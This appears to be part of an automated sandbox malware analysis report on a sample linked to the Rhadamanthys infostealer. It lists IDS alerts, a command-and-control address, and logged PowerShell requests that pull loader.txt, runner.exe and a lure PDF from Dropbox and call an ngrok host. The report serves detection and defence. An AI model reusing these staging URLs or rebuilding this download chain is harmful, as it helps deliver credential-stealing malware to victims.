                    Source: Binary string: ntdll.pdb source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2761257758.0000000004E70000.00000004.00000001.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2761700335.0000000005060000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2762652630.0000000005010000.00000004.00000001.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2762348726.0000000004E70000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: CallSite.Target.pdbM!< source: powershell.exe, 00000016.00000002.2690919569.000001A8BD585000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdbUGP source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2761257758.0000000004E70000.00000004.00000001.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2761700335.0000000005060000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2762652630.0000000005010000.00000004.00000001.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2762348726.0000000004E70000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: System.Management.Automation.resources, Version=3.0.0.0, Culture=en-GB, PublicKeyToken=31bf3856ad364e35.pdb source: powershell.exe, 00000016.00000002.2691184239.000001A8BD5C8000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32p; source: powershell.exe, 00000016.00000002.2687416084.000001A0BC0A0000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wkernel32.pdbUGP source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2763137608.0000000004E70000.00000004.00000001.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2763301834.0000000004F90000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000022.00000003.2769045343.00000000054C0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdbUGP source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2763809170.0000000004E70000.00000004.00000001.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2764066518.0000000005090000.00000004.00000001.00020000.00000000.sdmp
                    Source: C:\Windows\System32\fontdrvhost.exeCode function: 4x nop then dec esp39_2_0000011370010511

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 104.161.43.18:2845 -> 192.168.2.6:49931
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: https://104.161.43.18:2845/7e56fc199c7194d0/g5rgxmg9.bkfop
                    Source: global trafficTCP traffic: 192.168.2.6:49931 -> 104.161.43.18:2845
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeHTTP traffic: Redirect from: www.dropbox.com to https://ucdccc1744965d58711471073024.dl.dropboxusercontent.com/cd/0/get/cgigywzyq_gts7gdifdnmmaeanh123xyn-mpyu5zpisz6oepfncbt4ut3co-fsv6jmrjfyvyfc7vc78d3d9pmbbdubcsqbpg6nwyiczaif8sttqdui1fka2xrp_at5dupnmuvofblfnwetufinsgqq-e/file?dl=1#
                    Source: Joe Sandbox ViewIP Address: 162.125.69.18 162.125.69.18
                    Source: Joe Sandbox ViewIP Address: 162.125.69.15 162.125.69.15
                    Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                    Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49749 -> 162.125.69.18:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49840 -> 162.125.69.18:443
                    Source: global trafficHTTP traffic detected: GET /api/secure/921edf0e40341466669afb0baebb3d6e HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 23glcrtmzxqgwfpq3oujitt.ngrok.pizzaConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /scl/fi/wwnpbujiyqqrqopwkxcyc/secure.txt?rlkey=x8uqd3ph21yp3dt3mo8o3rpnd&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239340418577_1YCPJO6YBYEE06VWA&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239381963596_1EZBDO21TSG77E89L&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239340418578_1AMTWIX1RFG5EZ1V6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239381963595_1GOKBHWMF64DQK79Y&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239340418567_1CP2YH6ACBDMHMMFR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cd/0/get/CgjThj9J4LYCxQ4m9781PB-i6DM8ie3o4ofLacmyEI5Ia-6dN3jN8vAwCUwbkPn36hUDAPHCB6NX0PsiCU-83zLbN8fqw1lkGaB-t9uzckUV7WQRvn5oGJz76GOJyZNHh8YQtnlHacLXQI3-Sa9mMX8K/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ucf22feba25dd3a3196337a0818f.dl.dropboxusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239340418568_12QU0TF0Q0S6KJNUT&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /scl/fi/eq3zzfmbzxl2qzjzw9o23/loader.txt?rlkey=bmuqypu1j3oi6li0xv4rbm694&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
                    Source: global trafficHTTP traffic detected: GET /cd/0/get/CggX9InEjGrp3qf5MHF2B-OZg-4el73KgEMwt4fA3P4OxQ1dBqCjlYeqWm_pLfNpEOenkY4rC6FQnawF-cBRbf1H8PZyS2PBB4ZUbf8C32F05eNinNm8YheNnhmW_EgQzZFqlAxCZux4XWm7iOA3xXbe/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ucdd9b13509f51c836fc413bce70.dl.dropboxusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1 HTTP/1.1Host: www.dropbox.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                    Source: global trafficHTTP traffic detected: GET /cd/0/get/CgigYwzyq_gTs7gdIfDnmMAEanh123xyN-mpYu5zpIsZ6oepFNCBt4UT3cO-fSV6JmRJFyvYfC7vC78d3D9pMbbdUbCSQbpG6NWyiCZaiF8STtQdUi1fKa2xrP_aT5dupnmUVOfBLFnwetufinSGQQ-e/file?dl=1 HTTP/1.1Host: ucdccc1744965d58711471073024.dl.dropboxusercontent.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                    Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                    Source: global trafficHTTP traffic detected: GET /scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cd/0/get/Cghw7odouuVP5zAFfdnS8mkYkdEcHxcxeRVfOOLHoaVzf8CCxx4FYRE2toSmBIUSkAZ2VdW2HdPvLFiAkDwPdmC_5HYDIqN6fsWKpMoxUyzniDcSiXrh2CW-ZKL7s-PQM-0M0tkKwAILRH3xN_ZhESsc/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ucff4ea26bff00b5ef56c95e397d.dl.dropboxusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
                    Source: global trafficHTTP traffic detected: GET /cd/0/get/CggZQ6MA92jkJFVNQulAFQPZ1Z-PfRY6f4DVWW790BfPuOz9fs8kpop7SofVjwFUe8fid_RRRfFr3KULPd4IEzZqjCaOvm1Viyg7qZbtcEjlrfXMraQ_YzZLfVhNiL4qqyCzmYlqXU6tJd3GKRsjDe8M/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uccb79179262a53ec7922db7f8b0.dl.dropboxusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /metadata/921edf0e40341466669afb0baebb3d6e HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 23glcrtmzxqgwfpq3oujitt.ngrok.pizzaConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49751 version: TLS 1.0
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.10
                    Source: global trafficHTTP traffic detected: GET /api/secure/921edf0e40341466669afb0baebb3d6e HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 23glcrtmzxqgwfpq3oujitt.ngrok.pizzaConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /scl/fi/wwnpbujiyqqrqopwkxcyc/secure.txt?rlkey=x8uqd3ph21yp3dt3mo8o3rpnd&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239340418577_1YCPJO6YBYEE06VWA&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239381963596_1EZBDO21TSG77E89L&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239340418578_1AMTWIX1RFG5EZ1V6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239381963595_1GOKBHWMF64DQK79Y&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239340418567_1CP2YH6ACBDMHMMFR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cd/0/get/CgjThj9J4LYCxQ4m9781PB-i6DM8ie3o4ofLacmyEI5Ia-6dN3jN8vAwCUwbkPn36hUDAPHCB6NX0PsiCU-83zLbN8fqw1lkGaB-t9uzckUV7WQRvn5oGJz76GOJyZNHh8YQtnlHacLXQI3-Sa9mMX8K/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ucf22feba25dd3a3196337a0818f.dl.dropboxusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239340418568_12QU0TF0Q0S6KJNUT&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /scl/fi/eq3zzfmbzxl2qzjzw9o23/loader.txt?rlkey=bmuqypu1j3oi6li0xv4rbm694&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
                    Source: global trafficHTTP traffic detected: GET /cd/0/get/CggX9InEjGrp3qf5MHF2B-OZg-4el73KgEMwt4fA3P4OxQ1dBqCjlYeqWm_pLfNpEOenkY4rC6FQnawF-cBRbf1H8PZyS2PBB4ZUbf8C32F05eNinNm8YheNnhmW_EgQzZFqlAxCZux4XWm7iOA3xXbe/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ucdd9b13509f51c836fc413bce70.dl.dropboxusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1 HTTP/1.1Host: www.dropbox.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                    Source: global trafficHTTP traffic detected: GET /cd/0/get/CgigYwzyq_gTs7gdIfDnmMAEanh123xyN-mpYu5zpIsZ6oepFNCBt4UT3cO-fSV6JmRJFyvYfC7vC78d3D9pMbbdUbCSQbpG6NWyiCZaiF8STtQdUi1fKa2xrP_aT5dupnmUVOfBLFnwetufinSGQQ-e/file?dl=1 HTTP/1.1Host: ucdccc1744965d58711471073024.dl.dropboxusercontent.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                    Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                    Source: global trafficHTTP traffic detected: GET /scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cd/0/get/Cghw7odouuVP5zAFfdnS8mkYkdEcHxcxeRVfOOLHoaVzf8CCxx4FYRE2toSmBIUSkAZ2VdW2HdPvLFiAkDwPdmC_5HYDIqN6fsWKpMoxUyzniDcSiXrh2CW-ZKL7s-PQM-0M0tkKwAILRH3xN_ZhESsc/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ucff4ea26bff00b5ef56c95e397d.dl.dropboxusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
                    Source: global trafficHTTP traffic detected: GET /cd/0/get/CggZQ6MA92jkJFVNQulAFQPZ1Z-PfRY6f4DVWW790BfPuOz9fs8kpop7SofVjwFUe8fid_RRRfFr3KULPd4IEzZqjCaOvm1Viyg7qZbtcEjlrfXMraQ_YzZLfVhNiL4qqyCzmYlqXU6tJd3GKRsjDe8M/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uccb79179262a53ec7922db7f8b0.dl.dropboxusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /metadata/921edf0e40341466669afb0baebb3d6e HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 23glcrtmzxqgwfpq3oujitt.ngrok.pizzaConnection: Keep-Alive
                    Source: powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: -src https://* data: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-ancestors 'self' https://*.dropbox.com ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; img-src https://* data: blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js 